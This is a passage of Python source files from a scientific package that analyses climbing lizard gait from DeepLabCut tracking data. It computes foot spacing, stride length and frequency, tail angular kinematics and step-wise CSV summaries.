result_columns = ["mean_footpair_width", "mean_footpair_height", "mean_footpair_width_F", "mean_footpair_width_H"]
# generate 4 result columns for result dataframe which will contain widths and heights
for col in result_columns:
results[col] = np.full((data_rows_count,), np.NAN)
stride_lengths = []
# -----> Loops through feet
for foot, column in zip(forefeet, active_columns):
mid_stance_widths_F = [] # takes the 3 mid stance indices and calculated the mean angle
mid_stance_widths_H = [] # takes the 3 mid stance indices and calculated the mean angle
mid_stance_heights = [] # takes the 3 mid stance indices and calculated the mean angle
mid_stance_widths = [] # takes the 3 mid stance indices and calculated the mean angle
# create one loop for foot = FR (+ foot pair HL) & for for the opposite:
if foot == "FR":
hindfoot = "HL"
forefootpair = "FL"
hindfootpair = "HR"
hindfoot_column = "stepphase_{}".format(hindfoot)
column = column.strip('')
elif foot == "FL":
hindfoot = "HR"
forefootpair = "FR"
hindfootpair = "HL"
hindfoot_column = "stepphase_{}".format(hindfoot)
column = column.strip('')
for i in range(1, max_step_phase_count):
cell_value = loop_encode(i)
# finds the segment in the dataframe where the step phase equals the current step phase in the loop
df_stance_section = df_result_current[df_result_current[column] == cell_value]
if len(df_stance_section) == 0:
break
df_stance_section_indices = list(df_stance_section.index.values) # contains all frames of stride phase
if len(df_stance_section_indices) > 0:
stance_length = len(df_stance_section_indices)
#print(i, ": stance length {}|{}: ".format(foot, hindfoot), stance_length)
beg_end_tuple = (df_stance_section_indices[0], df_stance_section_indices[-1])
# get the middle of the stance:
if stance_length % 2 == 0:
mid_stance_index = beg_end_tuple[1] - stance_length / 2
else:
mid_stance_index = int((beg_end_tuple[1] - stance_length / 2.0) + 0.5)
# check if the body deflection of lizard is less than or equal to 15 deg:
deflection = df_stance_section.loc[mid_stance_index, "body_deflection_angle"]
if filter_deflection and deflection <= 15.0:
# check the likelihood for the foot label at the mid-stance index:
forefoot_likelihood = data.loc[mid_stance_index, (scorer, foot, "likelihood")]
hindfoot_likelihood = data.loc[mid_stance_index, (scorer, hindfoot, "likelihood")]
forefootpair_likelihood = data.loc[mid_stance_index, (scorer, forefootpair, "likelihood")]
if forefoot_likelihood >= likelihood and hindfoot_likelihood >= likelihood and forefootpair_likelihood >= likelihood:
# get the foot coordinates for fore- and hindfoot at the mid-stance index:
fore_foot_coords = (data.loc[mid_stance_index, (scorer, foot, "x")],
data.loc[mid_stance_index, (scorer, foot, "y")])
hind_foot_coords = (data.loc[mid_stance_index, (scorer, hindfoot, "x")],
data.loc[mid_stance_index, (scorer, hindfoot, "y")])
fore_foot_pair_coords = (data.loc[mid_stance_index, (scorer, forefootpair, "x")],
data.loc[mid_stance_index, (scorer, forefootpair, "y")])
hind_foot_pair_coords = (data.loc[mid_stance_index, (scorer, hindfootpair, "x")],
data.loc[mid_stance_index, (scorer, hindfootpair, "y")])
else:
fore_foot_coords = (np.nan, np.nan)
hind_foot_coords = (np.nan, np.nan)
fore_foot_pair_coords = (np.nan, np.nan)
hind_foot_pair_coords = (np.nan, np.nan)
# calculate the width and height
# the lizards run/climb along the x-axis, therefore width = y and height = x
height = abs(fore_foot_coords[0] - hind_foot_coords[0])
width = abs(fore_foot_coords[1] - hind_foot_coords[1])
width_F = abs(fore_foot_coords[1] - fore_foot_pair_coords[1])
width_H = abs(hind_foot_coords[1] - hind_foot_pair_coords[1])
mid_stance_heights.append(round(height, 2))
mid_stance_widths.append(round(width, 2))
mid_stance_widths_F.append(round(width_F, 2))
mid_stance_widths_H.append(round(width_H, 2))
else:
print(i, ": the lizard does not climbed aligned to vertical {} ... {}".format(deflection, filename))
mean_width = np.mean(mid_stance_widths)
mean_height = np.mean(mid_stance_heights)
mean_width_F = np.mean(mid_stance_widths_F)
mean_width_H = np.mean(mid_stance_widths_H)
#print("mean width and height: ", mean_width, mean_height)
for row in range(data_rows_count):
results[result_columns[0]][row] = mean_width
results[result_columns[1]][row] = mean_height
results[result_columns[2]][row] = mean_width_F
results[result_columns[3]][row] = mean_width_H
#print(results)
return results
def loop_encode(i):
# get utf-8 encoded version of the string
cell_value = 'stance000{}'.format(i).encode()
#print("-----> stance phase cell value :", cell_value)
return cell_value
```
#### File: lizardanalysis/calculations/spreading_between_contralateral_feet.py
```python
from lizardanalysis.utils import animal_settings
import numpy as np
def calc_spreading(**kwargs):
"""
This function calculated the spreading between contralateral feet at TIME
Return: Distance in px between forefeet and between hindfeet
"""
likelihood = kwargs.get('likelihood')
data = kwargs.get("data")
data_rows_count = kwargs.get("data_rows_count")
filename = kwargs.get("filename")
animal = kwargs.get("animal")
feet = animal_settings.get_list_of_feet(animal)
# only use the feet on the right to calculate distance to left counterpart
right_feet = [foot for foot in feet if "R" in foot]
print("right feet: ", right_feet)
scorer = data.columns[1][0]
results = {}
for foot in feet:
results[foot] = np.full((data_rows_count,), np.NAN)
```
#### File: lizardanalysis/calculations/step_wise_summary.py
```python
def read_DOKAoutput_files(config):
"""
All filenames should follow the pattern: ID_num_run_trialnum_direction*.csv
If they don't, use the R script nameFixer_v2.R in LizardTails first.
The summary file for the current DOKA project will be stored in the summary_folder in analysis_results.
:param config:
:return:
"""
print('\nCREATING AND WRITING SUMMARY RESULT FILES...\n...')
from pathlib import Path
import os
import errno
import glob
current_path = os.getcwd()
config_file = Path(config).resolve()
project_path = os.path.split(config_file)[0]
result_file_path = os.path.join(current_path, project_path, "analysis-results")
print('result filepath: ', result_file_path)
summary_folder = os.path.join(result_file_path, "analysis-summary")
try:
os.makedirs(summary_folder)
print("folder for summary result files created")
except OSError as e:
if e.errno != errno.EEXIST:
raise
# read in all csv files in folder which contain "_run_"
filelist = glob.glob(os.path.join(result_file_path, "*.csv"))
filelist_split = [x.rsplit(os.sep, 1)[1] for x in filelist]
print("Number of files found: ", len(filelist_split))
#print(" + ", *filelist_split, sep='\n + ')
return result_file_path, summary_folder, filelist_split, filelist
def create_tail_file(config):
### IMPORTS
import pandas as pd
from tkinter import Tk, filedialog
root = Tk()
root.withdraw() # we don't want a full GUI, so keep the root window from appearing
root.call('wm', 'attributes', '.', '-topmost', True)
tail_filepath = filedialog.askopenfilename(parent=root, initialdir=config, title="Select tailMass file") # show an "Open" dialog box and return the path to the selected file
root.destroy()
df_tailMorphs = pd.read_csv(tail_filepath) # read in gravity file
nrows = df_tailMorphs.shape[0]
print("df_TailMorphs: \n", df_tailMorphs)
# create dict which matched tail values with the responding column names in tailMass.csv/df_tailMorphs
tail_values_dict = {"SVL":"svlMM_speciesMean",
"tailLength":"tailLengthMM",
"bodyMass":"bodymass",
"tailMass":"tailMassEstimate",
"BCOMhip":"bodyCOMEstimateHip",
"TCOMhip":"TCOM_2"}
id_dict = {}
#print(list(df_tailMorphs['ID']))
for i, id in enumerate(list(df_tailMorphs['ID'])):
df_subsection_id = df_tailMorphs[df_tailMorphs['ID'] == id]
#print(df_subsection_id)
id_dict_values_dict = {}
for tail_value, tail_column in tail_values_dict.items():
id_dict_values_dict[tail_value] = df_subsection_id[tail_column].values[0]
id_dict[id] = id_dict_values_dict
#print("\n\n\n")
print("{" + "\n".join("{!r}: {!r},".format(k, v) for k, v in id_dict.items()) + "}")
return id_dict
def fill_in_tail_morphs(id_dict, species):
species_tailMorphs_dict = id_dict[species]
return species_tailMorphs_dict
def plot_ampl_vel_acc_stepwise(step_wise_df, summary_folder):
### IMPORTS:
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sn
import os
for row in range(step_wise_df.shape[0]):
df_active = step_wise_df.iloc[row]
# create % of stride x-axis list
ampl = df_active["angular_amplitude"]
x_axis_list = []
for i in range(len(ampl)):
x_axis_list.append((i/len(ampl))*100)
vel = df_active["angular_velocity"]
acc = df_active["angular_acceleration"]
plot_title = df_active["speciesID"] + " " + df_active["runNum"] + " " + df_active["direction"] + " " + df_active["footpair"] + " " + df_active["res_phase"]
### PLOT
fig, axes = plt.subplots(3, 1, sharex=True)
fig.suptitle(plot_title)
# plot amplitude
sn.lineplot(ax=axes[0], x=x_axis_list, y=ampl, color='black')
axes[0].set(ylabel="ang ampl")
#axes[0].axhline(0, ls="-", linewidth=0.8)
axes[0].axhline(df_active["mean_angular_amplitude"], ls="--", linewidth=0.8)
axes[0].text(10, df_active["mean_angular_amplitude"] + 1, "mean")
# plot velocity
sn.lineplot(ax=axes[1], x=x_axis_list, y=vel, color='black')
axes[1].set(ylabel="ang. vel")
axes[1].axhline(0, ls="-", linewidth=0.8)
axes[1].axhline(df_active["rms_angular_velocity"], ls="--", linewidth=0.8)
axes[1].text(10, df_active["rms_angular_velocity"] + 0.2, "RMS")
# plot acceleration
sn.lineplot(ax=axes[2], x=x_axis_list, y=acc, color='black')
axes[2].set(ylabel="ang acc", xlabel="% of stride duration")
axes[2].axhline(0, ls="-", linewidth=0.8)
axes[2].axhline(df_active["rms_angular_acceleration"], ls="--", linewidth=0.8)
axes[2].text(10, df_active["rms_angular_acceleration"] + 0.2, "RMS")
# save plots
fig1 = plt.gcf()
fig1.savefig(os.path.join(summary_folder, "{}.png".format(plot_title)), dpi=300)
plt.show()
return
### MAIN FUNCTION ###
def summarize_stepwise(config):
"""
!Temporary Notice:!
This function was written to work for only tail and spine analysis projects cropped to the default labels for lizards.
Reads in all DOKA output files and summarizes the data step-wise in one big csv document.
Step intervals from the step-detection algorithm are used (calculated in "footfall_by_switches.py").
:param config: the file path to the config file of the project
:return: saves step-wise summary files to a csv file
"""
### IMPORTS:
import pandas as pd
import os
import numpy as np
from lizardanalysis.utils import animal_settings, auxiliaryfunctions
# SETUP
feet = animal_settings.get_list_of_feet('lizard')
stepphase_columns = ["stepphase_{}".format(foot) for foot in feet]
# ----------------
plotting = False
# ----------------
print("summarizing data step wise")
# get a list of all DOKA output files:
result_file_path, summary_folder, filelist_split, filelist = read_DOKAoutput_files(config=config)
# create new dataframe for step-wise combined data
column_names = ["speciesID", "runNum", "direction", "footpair", "res_phase", "mean_body_deflection",
"mean_speed_PXperS",
"cranial_bA", "prox_bA", "tip_bA", "prox_dist", "dist_bA", "cranial_caudal",
"amplitude_Spine_A", "amplitude_Spine_B", "amplitude_Spine_C",
"amplitude_Tail_A", "amplitude_Tail_B", "amplitude_Tail_C", "amplitude_Tail_Tip",
"svl", "tailLength", "bodyMass", "tailMass", "BCOMhip", "TCOMhip",
"angular_amplitude", "angular_velocity", "angular_acceleration",
"mean_abs_angular_amplitude", "rms_angular_velocity", "rms_angular_acceleration"]
step_wise_df = pd.DataFrame(columns=column_names)
#print(step_wise_df)
### PRE-PROCESS
# create tail_file_dict which contains tail morphs for species
id_dict = create_tail_file(config)
# loop through every file and get...:
for file, file_name in zip(filelist, filelist_split):
# ... speciesID, trial, direction from the filename
species = file_name.split("_")[0]
speciesID = file_name.split("_")[0] + "_" + file_name.split("_")[1]
runNum = file_name.split("_")[2] + "_" + file_name.split("_")[3]
direction = file_name.split("_")[4]
### fill in tail mass, TCOM, BCOM, tailLength means per species ###
species_tailMorphs_dict = fill_in_tail_morphs(id_dict, species)
svl = species_tailMorphs_dict["SVL"]
tailLength = species_tailMorphs_dict["tailLength"]
bodyMass = species_tailMorphs_dict["bodyMass"]
tailMass = species_tailMorphs_dict["tailMass"]
BCOMhip = species_tailMorphs_dict["BCOMhip"]
TCOMhip = species_tailMorphs_dict["TCOMhip"]
### PROCESS FILE
print("\n========= ", speciesID, " =========")
print(runNum, direction)
# read in data as data frame
df = pd.read_csv(file, index_col=0)
#print(df.head(), "\n indices: ", df.index)
# find all step intervals for FL|HR, and FR|HL:
unique_steps_dict = {}
for step_col in stepphase_columns:
unique_steps_dict[step_col] = df[step_col].unique()
# delete all "b'nan'" entries in dict
for key, value_list in unique_steps_dict.items():
unique_steps_dict[key] = list(value_list[value_list != "b'nan'"])
#print(unique_steps_dict)
# find phases that occure in both stepphases of one foot-pair
FR_HL_stepphases = [i for i in unique_steps_dict['stepphase_FR'] if i in unique_steps_dict['stepphase_HL']]
FL_HR_stepphases = [i for i in unique_steps_dict['stepphase_FL'] if i in unique_steps_dict['stepphase_HR']]
#print("---\n", FR_HL_stepphases)
#print(FL_HR_stepphases)
# loop through every step (pairwise) and get section of data frame for rows where both stepphase columns have same phase
# --- FR_HL_stepphases
#print("\n### FR_HL_stepphases ####\n")
#i = 0
#nr_of_swings = [i + 1 for phase in FR_HL_stepphases if "swing" in phase]
#print("nr_of_swings: ", nr_of_swings)
for j, phase in enumerate(FR_HL_stepphases):
footpair = "FR_HL"
if "swing" in phase:
#print("j: ", j)
if j == 0 or j == 1:
# stance phases might often be empty because numbering can be different
# only detect swing phases, then add stance phase which comes before/after?? until next step phase
df_section_swing_old = df.loc[(df['stepphase_FR'] == phase) & (df['stepphase_HL'] == phase)]
#print("phase: ", phase, "\n", df_section_swing_old)
else:
# gets the next swing phase already to get the end for the swing phase
df_section_swing_new = df.loc[(df['stepphase_FR'] == phase) & (df['stepphase_HL'] == phase)]
#print("phase: ", phase, "\n", df_section_swing_new)
if df_section_swing_old.empty == False and df_section_swing_new.empty == False:
# gets the stance phase belonging after df_section_swing_old
df_section_stance_indexSTART = list(df_section_swing_old.index)[-1]
df_section_stance_indexEND = list(df_section_swing_new.index)[0]-1
df_section_stance = df.iloc[df_section_stance_indexSTART:df_section_stance_indexEND]
#print("stance {}: \n".format(FR_HL_stepphases[j-1]), df_section_stance)
# combine step-wise data:
res_phase = "step_" + ''.join(filter(lambda i: i.isdigit(), FR_HL_stepphases[j-1]))
mean_body_deflection = (np.nanmean(df_section_swing_old['body_deflection_angle']) + np.nanmean(df_section_stance['body_deflection_angle']))/2.0
mean_speed_PXperS = (np.nanmean(df_section_swing_old['speed_PXperS']) + np.nanmean(df_section_stance['speed_PXperS']))/2.0
cranial_bA = [i for i in list(df_section_swing_old["cranial_bA"])]+[j for j in list(df_section_stance["cranial_bA"])]
prox_bA = [i for i in list(df_section_swing_old["prox_bA"])]+[j for j in list(df_section_stance["prox_bA"])]
tip_bA = [i for i in list(df_section_swing_old["tip_bA"])]+[j for j in list(df_section_stance["tip_bA"])]
prox_dist = [i for i in list(df_section_swing_old["prox_dist"])]+[j for j in list(df_section_stance["prox_dist"])]
dist_bA = [i for i in list(df_section_swing_old["dist_bA"])]+[j for j in list(df_section_stance["dist_bA"])]
cranial_caudal = [i for i in list(df_section_swing_old["cranial_caudal"])]+[j for j in list(df_section_stance["cranial_caudal"])]
amplitude_Spine_A = [i for i in list(df_section_swing_old["amplitude_Spine_A"])]+[j for j in list(df_section_stance["amplitude_Spine_A"])]
amplitude_Spine_B = [i for i in list(df_section_swing_old["amplitude_Spine_B"])] + [j for j in list(df_section_stance["amplitude_Spine_B"])]
amplitude_Spine_C = [i for i in list(df_section_swing_old["amplitude_Spine_C"])] + [j for j in list(df_section_stance["amplitude_Spine_C"])]
amplitude_Tail_A = [i for i in list(df_section_swing_old["amplitude_Tail_A"])] + [j for j in list(df_section_stance["amplitude_Tail_A"])]
amplitude_Tail_B = [i for i in list(df_section_swing_old["amplitude_Tail_B"])] + [j for j in list(df_section_stance["amplitude_Tail_B"])]
amplitude_Tail_C = [i for i in list(df_section_swing_old["amplitude_Tail_C"])] + [j for j in list(df_section_stance["amplitude_Tail_C"])]
amplitude_Tail_Tip = [i for i in list(df_section_swing_old["amplitude_Tail_Tip"])] + [j for j in list(df_section_stance["amplitude_Tail_Tip"])]
angular_amplitude = [i for i in list(df_section_swing_old["tail_angular_amplitude"])] + [j for j in list(df_section_stance["tail_angular_amplitude"])]
mean_abs_angular_amplitude = (np.nanmean(abs(df_section_swing_old["tail_angular_amplitude"])) + np.nanmean(abs(df_section_stance["tail_angular_amplitude"])))/2.0
angular_velocity = [i for i in list(df_section_swing_old["tail_angular_velocity"])] + [j for j in list(df_section_stance["tail_angular_velocity"])]
rms_angular_velocity = np.nanmean(auxiliaryfunctions.rmsValue(list(df_section_swing_old["tail_angular_velocity"])) + auxiliaryfunctions.rmsValue(list(df_section_stance["tail_angular_velocity"])))/2.0
angular_acceleration = [i for i in list(df_section_swing_old["tail_angular_acceleration"])] + [j for j in list(df_section_stance["tail_angular_acceleration"])]
rms_angular_acceleration = np.nanmean(auxiliaryfunctions.rmsValue(list(df_section_swing_old["tail_angular_acceleration"])) + auxiliaryfunctions.rmsValue(list(df_section_stance["tail_angular_acceleration"])))/2.0
# write data from df_section_swing_old as swing phase and data from df_section_stance as stance phase of one step to new_step_row
# only do in this if loop because this gives complete steps
# the order of these values has to match dataframe above
new_step_row = [speciesID, runNum, direction, footpair, res_phase, mean_body_deflection, mean_speed_PXperS,
cranial_bA, prox_bA, tip_bA, prox_dist, dist_bA, cranial_caudal,
amplitude_Spine_A, amplitude_Spine_B, amplitude_Spine_C,
amplitude_Tail_A, amplitude_Tail_B, amplitude_Tail_C, amplitude_Tail_Tip,
svl, tailLength, bodyMass, tailMass, BCOMhip, TCOMhip,
angular_amplitude, angular_velocity, angular_acceleration,
mean_abs_angular_amplitude, rms_angular_velocity, rms_angular_acceleration]
#print("\n==> new_step_row: \n", new_step_row, "\n")
# append new_step_row to data frame:
df_length = len(step_wise_df)
step_wise_df.loc[df_length] = new_step_row
df_section_swing_old = df_section_swing_new
# --- FL_HR_stepphases
#print("\n### FL_HR_stepphases ####\n")
#i = 0
#nr_of_swings = [(i+1) for phase in FL_HR_stepphases if "swing" in phase][-1]
#print("nr_of_swings: ", nr_of_swings)
for j, phase in enumerate(FL_HR_stepphases):
footpair = "FL_HR"
if "swing" in phase:
#print("j: ", j)
if j == 0 or j == 1:
# stance phases might often be empty because numbering can be different
# only detect swing phases, then add stance phase which comes before/after?? until next step phase
df_section_swing_old = df.loc[(df['stepphase_FL'] == phase) & (df['stepphase_HR'] == phase)]
#print("phase: ", phase, "\n", df_section_swing_old)
else:
# gets the next swing phase already to get the end for the swing phase
df_section_swing_new = df.loc[(df['stepphase_FL'] == phase) & (df['stepphase_HR'] == phase)]
#print("phase: ", phase, "\n", df_section_swing_new)
if df_section_swing_old.empty == False and df_section_swing_new.empty == False:
# gets the stance phase belonging after df_section_swing_old
df_section_stance_indexSTART = list(df_section_swing_old.index)[-1]
df_section_stance_indexEND = list(df_section_swing_new.index)[0] - 1
df_section_stance = df.iloc[df_section_stance_indexSTART:df_section_stance_indexEND]
#print("stance {}: \n".format(FL_HR_stepphases[j - 1]), df_section_stance)
# combine step-wise data:
res_phase = "step_" + ''.join(filter(lambda i: i.isdigit(), FL_HR_stepphases[j - 1]))
mean_body_deflection = (np.nanmean(df_section_swing_old['body_deflection_angle']) + np.nanmean(df_section_stance['body_deflection_angle'])) / 2.0
mean_speed_PXperS = (np.nanmean(df_section_swing_old['speed_PXperS']) + np.nanmean(df_section_stance['speed_PXperS'])) / 2.0
cranial_bA = [i for i in list(df_section_swing_old["cranial_bA"])] + [j for j in list(df_section_stance["cranial_bA"])]
prox_bA = [i for i in list(df_section_swing_old["prox_bA"])] + [j for j in list(df_section_stance["prox_bA"])]
tip_bA = [i for i in list(df_section_swing_old["tip_bA"])] + [j for j in list(df_section_stance["tip_bA"])]
prox_dist = [i for i in list(df_section_swing_old["prox_dist"])] + [j for j in list(df_section_stance["prox_dist"])]
dist_bA = [i for i in list(df_section_swing_old["dist_bA"])] + [j for j in list(df_section_stance["dist_bA"])]
cranial_caudal = [i for i in list(df_section_swing_old["cranial_caudal"])] + [j for j in list(df_section_stance["cranial_caudal"])]
amplitude_Spine_A = [i for i in list(df_section_swing_old["amplitude_Spine_A"])] + [j for j in list(df_section_stance["amplitude_Spine_A"])]
amplitude_Spine_B = [i for i in list(df_section_swing_old["amplitude_Spine_B"])] + [j for j in list(df_section_stance["amplitude_Spine_B"])]
amplitude_Spine_C = [i for i in list(df_section_swing_old["amplitude_Spine_C"])] + [j for j in list(df_section_stance["amplitude_Spine_C"])]
amplitude_Tail_A = [i for i in list(df_section_swing_old["amplitude_Tail_A"])] + [j for j in list(df_section_stance["amplitude_Tail_A"])]
amplitude_Tail_B = [i for i in list(df_section_swing_old["amplitude_Tail_B"])] + [j for j in list(df_section_stance["amplitude_Tail_B"])]
amplitude_Tail_C = [i for i in list(df_section_swing_old["amplitude_Tail_C"])] + [j for j in list(df_section_stance["amplitude_Tail_C"])]
amplitude_Tail_Tip = [i for i in list(df_section_swing_old["amplitude_Tail_Tip"])] + [j for j in list(df_section_stance["amplitude_Tail_Tip"])]
angular_amplitude = [i for i in list(df_section_swing_old["tail_angular_amplitude"])] + [j for j in list(df_section_stance["tail_angular_amplitude"])]
mean_abs_angular_amplitude = (np.nanmean(abs(df_section_swing_old["tail_angular_amplitude"])) + np.nanmean(abs(df_section_stance["tail_angular_amplitude"]))) / 2.0
angular_velocity = [i for i in list(df_section_swing_old["tail_angular_velocity"])] + [j for j in list(df_section_stance["tail_angular_velocity"])]
rms_angular_velocity = np.nanmean(auxiliaryfunctions.rmsValue(list(df_section_swing_old["tail_angular_velocity"])) + auxiliaryfunctions.rmsValue(list(df_section_stance["tail_angular_velocity"]))) / 2.0
angular_acceleration = [i for i in list(df_section_swing_old["tail_angular_acceleration"])] + [j for j in list(df_section_stance["tail_angular_acceleration"])]
rms_angular_acceleration = np.nanmean(auxiliaryfunctions.rmsValue(list(df_section_swing_old["tail_angular_acceleration"])) + auxiliaryfunctions.rmsValue(list(df_section_stance["tail_angular_acceleration"]))) / 2.0
# write data from df_section_swing_old as swing phase and data from df_section_stance as stance phase of one step to new_step_row
# only do in this if loop because this gives complete steps
new_step_row = [speciesID, runNum, direction, footpair, res_phase, mean_body_deflection,
mean_speed_PXperS,
cranial_bA, prox_bA, tip_bA, prox_dist, dist_bA, cranial_caudal,
amplitude_Spine_A, amplitude_Spine_B, amplitude_Spine_C,
amplitude_Tail_A, amplitude_Tail_B, amplitude_Tail_C, amplitude_Tail_Tip,
svl, tailLength, bodyMass, tailMass, BCOMhip, TCOMhip,
angular_amplitude, angular_velocity, angular_acceleration,
mean_abs_angular_amplitude, rms_angular_velocity, rms_angular_acceleration]
#print("\n==> new_step_row: \n", new_step_row, "\n")
# append new_step_row to data frame:
df_length = len(step_wise_df)
step_wise_df.loc[df_length] = new_step_row
df_section_swing_old = df_section_swing_new
print(step_wise_df)
# save results:
step_wise_df.to_csv(os.path.join(summary_folder, "step_wise_summary_tails.csv"), header=True, index=False)
if plotting == True:
plot_ampl_vel_acc_stepwise(step_wise_df, summary_folder)
```
#### File: lizardanalysis/calculations/stride_length_and_frequency.py
```python
def stride_length_and_frequency(**kwargs):
"""
Stride length = distance covered by body during one step (swing + stance) in px
Stride frequency = number of strides per second (determined with the framerate defined in the config file by the user)
"""
import numpy as np
import pandas as pd
#pd.set_option('display.max_columns', None) # for printing the df in console
from lizardanalysis.utils import animal_settings, auxiliaryfunctions
pd.set_option('display.max_columns', None)
# define necessary **kwargs:
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
df_result_current = kwargs.get('df_result_current')
likelihood = kwargs.get('likelihood')
animal = kwargs.get('animal')
config = kwargs.get('config')
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
max_stride_phase_count = 1000
active_columns = []
# get the framerate defined in the config file:
cfg = auxiliaryfunctions.read_config(config)
framerate = cfg['framerate']
for foot in feet:
active_columns.append("stepphase_{}".format(foot))
# print("active_columns: ", active_columns)
stride_lengths = []
results = {}
for foot, column in zip(feet, active_columns):
# print("\n----------- FOOT: ", foot)
column = column.strip('')
# print("column :", column)
results[foot] = np.full((data_rows_count,), np.NAN)
for i in range(1, max_stride_phase_count):
# this looks for all stride phases of the current foot
cell_value = loop_encode(i)
df_stride_section = df_result_current[df_result_current[column] == cell_value]
if len(df_stride_section) == 0:
break
# print(df_stride_section)
df_stride_section_indices = list(df_stride_section.index.values)
if len(df_stride_section_indices) > 0:
beg_end_tuple = (df_stride_section_indices[0], df_stride_section_indices[-1])
# filter for likelihood of labels:
likelihood_shoulder_begin = data.loc[beg_end_tuple[0]][scorer, "Shoulder", 'likelihood']
likelihood_shoulder_end = data.loc[beg_end_tuple[1]][scorer, "Shoulder", 'likelihood']
likelihood_hip_begin = data.loc[beg_end_tuple[0]][scorer, "Hip", 'likelihood']
likelihood_hip_end = data.loc[beg_end_tuple[1]][scorer, "Hip", 'likelihood']
# only includes strides where the shoulder to hip of the lizard are fully accurately tracked
if likelihood_shoulder_begin >= likelihood and likelihood_shoulder_end >= likelihood \
and likelihood_hip_begin >= likelihood and likelihood_hip_end >= likelihood:
# calculate the euclidean distance between last coord and current coord of shoulder and hip -> mean
xdiff_shoulder = data.loc[beg_end_tuple[1]][scorer, "Shoulder", 'x'] - data.loc[beg_end_tuple[0]][
scorer, "Shoulder", 'x']
ydiff_shoulder = data.loc[beg_end_tuple[1]][scorer, "Shoulder", 'y'] - data.loc[beg_end_tuple[0]][
scorer, "Shoulder", 'y']
distance_shoulder = np.sqrt(xdiff_shoulder ** 2 + ydiff_shoulder ** 2)
xdiff_hip = data.loc[beg_end_tuple[1]][scorer, "Hip", 'x'] - data.loc[beg_end_tuple[0]][
scorer, "Hip", 'x']
ydiff_hip = data.loc[beg_end_tuple[1]][scorer, "Hip", 'y'] - data.loc[beg_end_tuple[0]][
scorer, "Hip", 'y']
distance_hip = np.sqrt(xdiff_hip ** 2 + ydiff_hip ** 2)
else:
distance_shoulder = np.NAN
distance_hip = np.NAN
else:
distance_shoulder = np.NAN
distance_hip = np.NAN
distance = get_distance_average(distance_shoulder, distance_hip)
if i > 1:
# saves the distance to results for the current foot, for stride1 beg until stride 2 begin
for row in range(prev_beg_end_tuple[0], beg_end_tuple[0] + 1):
results[foot][row] = distance
stride_lengths.append(abs(prev_beg_end_tuple[0] - (beg_end_tuple[0] + 1)))
#print("stride_lengths: ", stride_lengths)
prev_beg_end_tuple = beg_end_tuple
# calculate the stride frequency
stride_frequency = np.round(framerate/np.mean(stride_lengths), 2)
print(stride_frequency)
frequency_list = np.array(data_rows_count * [stride_frequency], dtype=np.string_)
frequency_list = [decode(freq) for freq in frequency_list]
# rename dictionary keys of results
results = {'stride-length_' + key: value for (key, value) in results.items()}
# print("\n \n -------------------- results FINAL: \n", results)
# add stride frequency to results
results['stride_frequency'] = frequency_list
return results
def loop_encode(i):
# get utf-8 encoded version of the string
cell_value = 'stance000{}'.format(i).encode()
#print("-----> stance phase cell value :", cell_value)
return cell_value
def decode(byte_object):
decoded = byte_object.decode("ASCII")
return decoded
def get_distance_average(dist1, dist2):
import numpy as np
if np.isnan(dist1) == True and np.isnan(dist2) == False:
distance = dist2
elif np.isnan(dist1) == False and np.isnan(dist2) == True:
distance = dist1
elif np.isnan(dist1) == True and np.isnan(dist2) == True:
distance = np.NaN
else:
distance = (dist1 + dist2) / 2.0
return distance
```
#### File: lizardanalysis/calculations/tail_kinematics.py
```python
def tail_kinematics(**kwargs):
"""
calculates the tail angular amplitude, velocity and acceleration of the TCOM relative to the body axis.
The average TCOM location of the lizards is ~30% (get correct value).
Given that we have 4 labels along the tail (Tail_A, Tail_B, Tail_C, Tail_Tip), where A is 25% tailLength, B 50%,
C 75% and Tip 100%, the rough TCOM label is between Tail_A and Tail_B.
We did not use the exact TCOM position in percent to average this, because the label positions on the tail jump
a bit during tracking.
:return: tail_angular_amplitude, tail_angular_velocity, tail_angular_acceleration
"""
### IMPORTS
from lizardanalysis.utils import auxiliaryfunctions
import pandas as pd
import numpy as np
print("tail kinematics")
### SETUP
config = kwargs.get('config')
likelihood = kwargs.get('likelihood')
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
scorer = data.columns[1][0]
tail_kinematic_params = ["tail_angular_amplitude", "tail_angular_velocity", "tail_angular_acceleration"]
results = {}
for param in tail_kinematic_params:
results[param] = np.full((data_rows_count,), np.NAN)
### Calculations
# estimate the TCOM label position
tcom_x, tcom_y = auxiliaryfunctions.estimate_TCOM_label_coords(data.loc[:, (scorer, 'Tail_A', "x")],
data.loc[:, (scorer, 'Tail_A', 'y')],
data.loc[:, (scorer, 'Tail_B', 'x')],
data.loc[:, (scorer, 'Tail_B', 'y')])
# for every frame
for index in range(len(tcom_x)):
# build a TCOM vector
likelihood_hip = data.loc[index, (scorer, "Hip", "likelihood")]
likelihood_tail_a = data.loc[index, (scorer, "Tail_A", "likelihood")]
likelihood_tail_b = data.loc[index, (scorer, "Tail_B", "likelihood")]
if likelihood_hip >= likelihood and likelihood_tail_a >= likelihood and likelihood_tail_b >= likelihood:
tcom_vector = ((data.loc[index, (scorer, "Hip", "x")] - tcom_x[index]),
(data.loc[index, (scorer, "Hip", "y")] - tcom_y[index]))
print("TCOM vector: ", tcom_vector)
else:
tcom_vector = (np.nan, np.nan)
# get the body axis vector
body_axis_vector = auxiliaryfunctions.calc_body_axis(data, index, scorer)
# calculate the angle between the two
# TODO: find out which values mean which (+ vs -)
angle_deg = auxiliaryfunctions.py_angle_betw_2vectors_atan(body_axis_vector, tcom_vector)
# add angle to results dataframe
results[tail_kinematic_params[0]][index] = angle_deg
print("angular amplitudes: ", results[tail_kinematic_params[0]])
print("length of amplitudes: ", len(results[tail_kinematic_params[0]]))
# calculate the anglular velocity from amplitude list
dy = np.diff(results[tail_kinematic_params[0]])
np.append(dy, np.nan)
for index, val in enumerate(dy):
results[tail_kinematic_params[1]][index] = val
# calculate the angular acceleration from velocity list
ddy = np.diff(results[tail_kinematic_params[1]])
np.append(ddy, np.nan)
for index, val in enumerate(ddy):
results[tail_kinematic_params[2]][index] = val
print("{" + "\n".join("{!r}: {!r},".format(k, v) for k, v in results.items()) + "}")
return results
```
#### File: ClimbingLizardDLCAnalysis/lizardanalysis/DOKA_GUI.py
```python
import sys
import traceback
import datetime
from time import sleep
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtGui import QColor, QPixmap, QFont
from PyQt5.QtWidgets import *
from lizardanalysis.GUI.DLC_Output_Kinematic_Analysis import Ui_MainWindow # importing our generated file
from lizardanalysis.calculations import read_in_files
